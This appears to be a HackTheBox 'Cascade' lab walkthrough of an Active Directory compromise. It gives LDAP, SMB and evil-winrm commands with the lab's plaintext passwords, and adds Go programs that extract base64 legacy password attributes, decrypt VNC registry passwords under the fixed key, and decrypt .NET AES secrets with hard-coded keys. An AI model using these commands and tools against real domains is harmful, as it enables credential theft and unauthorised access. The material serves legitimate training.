Hey, Hackers! Today we're going to dive into Cascade, a HackTheBox Active Directory machine that is all about careful enumeration and connecting small details. Let's jump right in and have some fun!
Scanning
Let's start by scanning the target IP with nmap:
nmap -p- -sV -O -A 10.10.10.182
The scan showed a bunch of open ports. Anonymous enumeration of the domain, SMB and the other services turned up nothing interesting, so I moved on to the LDAP port.
LDAP Enumeration
Using ldapsearch, I first pulled the naming contexts, which we need as the search base later:
ldapsearch -H ldap://10.10.10.182 -x -s base namingcontexts
Then I enumerated users with the command below:
ldapsearch -x -H ldap://10.10.10.182 -D 'CN=Schema,CN=Configuration,DC=cascade,DC=local' -b 'DC=cascade,DC=local' | grep userPrincipalName | sed 's/userPrincipalName: //'
and found some users. Note that no password is supplied with -D, so this is effectively an anonymous bind; a DC that lets an anonymous bind read user objects is a finding in itself.
Then I saved the complete ldapsearch output to a file so I could analyse it offline:
ldapsearch -x -H ldap://10.10.10.182 -D 'CN=Schema,CN=Configuration,DC=cascade,DC=local' -b 'DC=cascade,DC=local' | tee ldapsearch.txt
After a bit of reading I found a non-standard attribute named cascadeLegacyPwd on the r.thompson user.
Its value was base64 encoded, and decoding it gave a string that looks like a password:
$ echo "clk0bjVldmE=" | base64 -d
rY4n5eva
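Grepping the dump works, but a small parser makes the attribute hunt repeatable over the whole file and over any other attribute you want to check. The Go program below is an added example, not part of the original write-up: it parses ldapsearch's LDIF output, unfolds continuation lines, decodes the "attr::" base64 form ldapsearch uses for binary values, and pulls cascadeLegacyPwd out of every entry that has one. The LDIF embedded in it is constructed for the example; only the r.thompson value clk0bjVldmE= is taken from the dump above.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
)

// Entry is one directory object reconstructed from ldapsearch's LDIF output.
// Attribute names are lowercased: LDAP attribute names are case-insensitive.
type Entry struct {
	DN    string
	Attrs map[string][]string
}

// sampleLDIF is a constructed, cut-down imitation of the ldapsearch dump.
// Only the cascadeLegacyPwd value for r.thompson comes from the write-up;
// every other value is invented for this example.
const sampleLDIF = `# extended LDIF
# base <DC=cascade,DC=local> with scope subtree

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: r.thompson
userPrincipalName: r.thompson@cascade.local
description: ldapsearch folds long values onto a continuation line that be
 gins with a single space
objectGUID:: L2cYqw6n4E6dDNd+LqTjnQ==
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: s.smith
userPrincipalName: s.smith@cascade.local

# search result
search: 2
result: 0 Success
`

// ParseLDIF turns LDIF text into entries: it unfolds continuation lines (a line
// starting with one space continues the previous one), skips comments, decodes
// "attr:: <base64>" values (ldapsearch's encoding for binary or non-ASCII data)
// and drops blocks that have no dn, such as the trailing search-result block.
func ParseLDIF(text string) []Entry {
	text = strings.ReplaceAll(strings.ReplaceAll(text, "\r\n", "\n"), "\n ", "")
	var entries []Entry
	for _, block := range strings.Split(text, "\n\n") {
		e := Entry{Attrs: map[string][]string{}}
		for _, line := range strings.Split(block, "\n") {
			i := strings.Index(line, ":")
			if strings.HasPrefix(line, "#") || i < 0 {
				continue
			}
			name, value := strings.ToLower(line[:i]), strings.TrimSpace(line[i+1:])
			if strings.HasPrefix(value, ":") { // "attr:: base64"
				raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(value[1:]))
				if err != nil {
					continue
				}
				value = string(raw)
			}
			if name == "dn" {
				e.DN = value
			} else {
				e.Attrs[name] = append(e.Attrs[name], value)
			}
		}
		if e.DN != "" {
			entries = append(entries, e)
		}
	}
	return entries
}

// FindLegacyPasswords maps sAMAccountName to the decoded cascadeLegacyPwd of every
// entry that carries the attribute. It is an ordinary string attribute whose
// content happens to be base64, so it is decoded a second time here.
func FindLegacyPasswords(entries []Entry) (map[string]string, error) {
	out := map[string]string{}
	for _, e := range entries {
		vals, sam := e.Attrs["cascadelegacypwd"], e.Attrs["samaccountname"]
		if len(vals) == 0 || len(sam) == 0 {
			continue
		}
		pw, err := base64.StdEncoding.DecodeString(vals[0])
		if err != nil {
			return nil, fmt.Errorf("%s: cascadeLegacyPwd is not base64: %w", sam[0], err)
		}
		out[sam[0]] = string(pw)
	}
	return out, nil
}

func main() {
	creds, err := FindLegacyPasswords(ParseLDIF(sampleLDIF))
	fmt.Println(creds, err) // map[r.thompson:rY4n5eva] <nil>
}
```

Feed it the real ldapsearch.txt instead of sampleLDIF and swap "cascadelegacypwd" for any other attribute name (lowercased) to sweep the whole directory for the same kind of leftover.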
I tried this string as r.thompson's password for listing shares, and it worked :)
smbclient -L //10.10.10.182/ --user r.thompson --password rY4n5eva
I tried accessing the Audit$ and Data shares and was able to access Data:
smbclient //10.10.10.182/Data --user r.thompson --password rY4n5eva
I wanted to list every file in this share, so I turned on recursive listing:
smb: \> recurse ON
smb: \> ls
This lists every file and directory in the share. In the listing I found an HTML file named Meeting_Notes_June_2018.html
inside \IT\Email Archives, which I downloaded with the get command.
The file contains an important detail: a deleted account with username TempAdmin whose password is the same as the Administrator account's password.
Back in the SMB listing I also found a registry export, VNC Install.reg,
inside \IT\Temp\s.smith, which I downloaded to my local system as well.
The file has a Password field stored as hex. VNC servers store passwords DES-encrypted under a fixed, publicly known key rather than hashed, so the value is reversible; I searched for a VNC password decrypt tool and found https://github.com/trinitronx/vncpasswd.py
I cloned the tool on my Kali Linux box and used it to recover s.smith's password :)
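For reference, this is what vncpasswd.py is doing under the hood. The Go program below is an added example, neither the tool's code nor part of the original write-up: VNC "encrypts" stored passwords with DES-ECB under a fixed key published in the VNC source, with the twist that the original implementation consumes each key byte with its bits reversed, so a standards-conforming DES library needs the bit-reversed key. The .reg line in it is constructed by encrypting the password recovered above; the actual hex value from VNC Install.reg is not reproduced here.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// vncKey is the fixed key every VNC flavour uses to obfuscate stored passwords;
// it is published in the VNC source. The original DES routine reads key bits
// in reverse order, so a standard library needs each byte bit-reversed (desKey).
var vncKey = [8]byte{0x17, 0x52, 0x6b, 0x06, 0x23, 0x4e, 0x58, 0x07}

// desKey returns vncKey with the bits of every byte reversed.
func desKey() []byte {
	k := make([]byte, 8)
	for i, b := range vncKey {
		var r byte
		for j := 0; j < 8; j++ {
			r = r<<1 | (b>>j)&1
		}
		k[i] = r
	}
	return k // e8 4a d6 60 c4 72 1a e0
}

// VNCDecrypt reverses the obfuscation: DES-ECB under the fixed key, then strip
// the NUL padding. A VNC password is at most 8 characters, so the registry value
// is normally exactly one block, but longer blobs are handled block by block.
func VNCDecrypt(blob []byte) (string, error) {
	if len(blob) == 0 || len(blob)%des.BlockSize != 0 {
		return "", fmt.Errorf("blob must be a non-empty multiple of %d bytes, got %d", des.BlockSize, len(blob))
	}
	c, err := des.NewCipher(desKey())
	if err != nil {
		return "", err
	}
	out := make([]byte, len(blob))
	for i := 0; i < len(blob); i += des.BlockSize {
		c.Decrypt(out[i:i+des.BlockSize], blob[i:i+des.BlockSize])
	}
	return string(bytes.TrimRight(out, "\x00")), nil
}

// VNCEncrypt is the forward direction, used here only to build a constructed
// sample: VNC truncates the password to 8 bytes, NUL-pads it and encrypts one block.
func VNCEncrypt(password string) []byte {
	var block [des.BlockSize]byte
	copy(block[:], password) // stops after 8 bytes; the rest stays NUL
	c, _ := des.NewCipher(desKey())
	out := make([]byte, des.BlockSize)
	c.Encrypt(out, block[:])
	return out
}

// ParseRegHex extracts the bytes from a .reg line of the form
// "Password"=hex:<comma-separated bytes>, tolerating whitespace and the
// trailing backslash regedit uses for line continuation.
func ParseRegHex(line string) ([]byte, error) {
	i := strings.Index(line, "hex:")
	if i < 0 {
		return nil, errors.New("no hex: value on line")
	}
	clean := strings.NewReplacer(",", "", "\\", "", " ", "", "\t", "", "\r", "", "\n", "").Replace(line[i+4:])
	return hex.DecodeString(clean)
}

// FormatRegHex renders bytes the way a registry export writes them.
func FormatRegHex(name string, b []byte) string {
	parts := make([]string, len(b))
	for i, x := range b {
		parts[i] = fmt.Sprintf("%02x", x)
	}
	return fmt.Sprintf("%q=hex:%s", name, strings.Join(parts, ","))
}

func main() {
	// Constructed sample: encrypt the recovered password and print the registry
	// line a VNC installer would have written for it, then decrypt it again.
	line := FormatRegHex("Password", VNCEncrypt("sT333ve2"))
	fmt.Println(line)
	blob, _ := ParseRegHex(line)
	pw, _ := VNCDecrypt(blob)
	fmt.Println("decrypted:", pw) // sT333ve2
}
```

Paste the real "Password"=hex:... line from the .reg file into ParseRegHex to decrypt it. Because the key is fixed and public, any VNC password you find on a share or in a registry hive is effectively plaintext; treat such files as credential material.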
Using this password with evil-winrm I logged in as s.smith and found user.txt:
evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Next I enumerated the SMB shares as s.smith:
$ smbclient -L //10.10.10.182/ --user s.smith --password sT333ve2
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
I tried accessing the Audit$ share:
smbclient //10.10.10.182/Audit$ --user s.smith --password sT333ve2
In this share I found an interesting binary, a DLL and a .db file:
$ smbclient //10.10.10.182/Audit$ --user s.smith --password sT333ve2
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 23:31:26 2020
.. D 0 Wed Jan 29 23:31:26 2020
CascAudit.exe An 13312 Wed Jan 29 03:16:51 2020
CascCrypto.dll An 12288 Wed Jan 29 23:30:20 2020
DB D 0 Wed Jan 29 03:10:59 2020
RunAudit.bat A 45 Wed Jan 29 04:59:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 12:08:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 12:08:38 2019
x64 D 0 Mon Jan 27 03:55:27 2020
x86 D 0 Mon Jan 27 03:55:27 2020
6553343 blocks of size 4096. 1618893 blocks available
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (8.7 KiloBytes/sec) (average 8.7 KiloBytes/sec)
smb: \> get CascCrypto.dll
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (10.0 KiloBytes/sec) (average 9.2 KiloBytes/sec)
smb: \> cd DB
smb: \DB\> dir
. D 0 Wed Jan 29 03:10:59 2020
.. D 0 Wed Jan 29 03:10:59 2020
Audit.db An 24576 Wed Jan 29 03:09:24 2020
6553343 blocks of size 4096. 1618893 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (9.8 KiloBytes/sec) (average 9.5 KiloBytes/sec)
smb: \DB\> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now
I downloaded them to my system.
The file command shows that Audit.db is a SQLite 3 database:
$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60
I opened the database with a SQLite browser (DB Browser for SQLite or the sqlite3 CLI both work).
Inside the Ldap table I found another user, ArkSvc, together with an encrypted password :(
The next task was to disassemble the exe and dll files we found on the share. The same file check shows they are .NET assemblies,
so I opened both in dnSpy and found the decryption routine: AES with a hard-coded key and IV.
Using an online AES decryption tool with those values I recovered the plaintext password.
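The online tool is convenient, but the decryption is short enough to reimplement, and doing so shows why the key and IV alone are enough. The Go program below is an added example, neither CascCrypto's code nor part of the original write-up. It assumes the .NET code built its cipher with Aes.Create() and set only Key and IV, so the .NET defaults of CBC mode and PKCS7 padding apply; if the decompiled code sets Mode or Padding to something else, adjust accordingly. The key and IV in it are placeholders, and the ciphertext is produced by encrypting the recovered password; the real values from the DLL and Audit.db are not reproduced here.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
)

// pkcs7Unpad strips PKCS7 padding and rejects malformed padding, which is the
// usual symptom of a wrong key or IV.
func pkcs7Unpad(b []byte, bs int) ([]byte, error) {
	if len(b) == 0 || len(b)%bs != 0 {
		return nil, errors.New("plaintext is not a whole number of blocks")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > bs || n > len(b) {
		return nil, errors.New("bad PKCS7 padding")
	}
	for _, x := range b[len(b)-n:] {
		if int(x) != n {
			return nil, errors.New("bad PKCS7 padding")
		}
	}
	return b[:len(b)-n], nil
}

// DecryptDotNetAES reproduces what a .NET routine built on Aes.Create() with only
// Key and IV assigned does: CBC mode and PKCS7 padding (the .NET defaults), key
// and IV used as their raw UTF-8 bytes, ciphertext supplied as base64.
func DecryptDotNetAES(b64, key, iv string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", fmt.Errorf("ciphertext is not base64: %w", err)
	}
	if len(iv) != aes.BlockSize {
		return "", fmt.Errorf("IV must be %d bytes, got %d", aes.BlockSize, len(iv))
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext length is not a multiple of the block size")
	}
	block, err := aes.NewCipher([]byte(key)) // 16/24/32-byte key selects AES-128/192/256
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(iv)).CryptBlocks(pt, ct)
	pt, err = pkcs7Unpad(pt, aes.BlockSize)
	if err != nil {
		return "", err
	}
	return string(pt), nil
}

// EncryptDotNetAES is the matching forward direction; it exists only to build
// the constructed sample ciphertext used below.
func EncryptDotNetAES(plaintext, key, iv string) (string, error) {
	if len(iv) != aes.BlockSize {
		return "", fmt.Errorf("IV must be %d bytes, got %d", aes.BlockSize, len(iv))
	}
	block, err := aes.NewCipher([]byte(key))
	if err != nil {
		return "", err
	}
	n := aes.BlockSize - len(plaintext)%aes.BlockSize // PKCS7 always adds 1..16 bytes
	pt := append([]byte(plaintext), bytes.Repeat([]byte{byte(n)}, n)...)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, []byte(iv)).CryptBlocks(ct, pt)
	return base64.StdEncoding.EncodeToString(ct), nil
}

// Constructed stand-ins for the constants dnSpy shows in the real DLL; the
// real key and IV are deliberately not reproduced here.
const (
	sampleKey = "0123456789abcdef" // 16 bytes -> AES-128
	sampleIV  = "fedcba9876543210" // 16 bytes, one AES block
)

func main() {
	ct, _ := EncryptDotNetAES("w3lc0meFr31nd", sampleKey, sampleIV)
	fmt.Println("base64 ciphertext as it would sit in Audit.db:", ct)
	pt, err := DecryptDotNetAES(ct, sampleKey, sampleIV)
	fmt.Println(pt, err) // w3lc0meFr31nd <nil>
	_, err = DecryptDotNetAES(ct, "wrongkeywrongkey", sampleIV)
	fmt.Println("wrong key:", err) // almost always a padding error
}
```

Replace sampleKey and sampleIV with the strings from the decompiled DLL and pass the base64 value from the Ldap table as the first argument. A wrong key or IV nearly always surfaces as a padding error rather than as readable output, which is a handy check that you pulled the right constants before trusting the result.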
Then, using these credentials with evil-winrm, I logged in as the ArkSvc user:
$ evil-winrm -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents>
After a bit of enumeration I found that this user is a member of an interesting group: AD Recycle Bin.
Some searching on AD Recycle Bin showed that its members can read objects that were deleted from the directory, including their remaining attributes, and restore them: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#a-d-recycle-bin
That means we can try to recover the deleted TempAdmin account, or at least read what is left of it:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
The result included the TempAdmin object.
Here cascadeLegacyPwd grabbed my attention again; I copied the value of the field and base64-decoded it:
$ echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles
This looks like TempAdmin's password, and the meeting notes told us earlier that it also works for the Administrator account:
Username is TempAdmin (password is the same as the normal admin account password)
I tried this password for the Administrator user with evil-winrm and it worked like a charm :)
Cascade Completed Successfully !!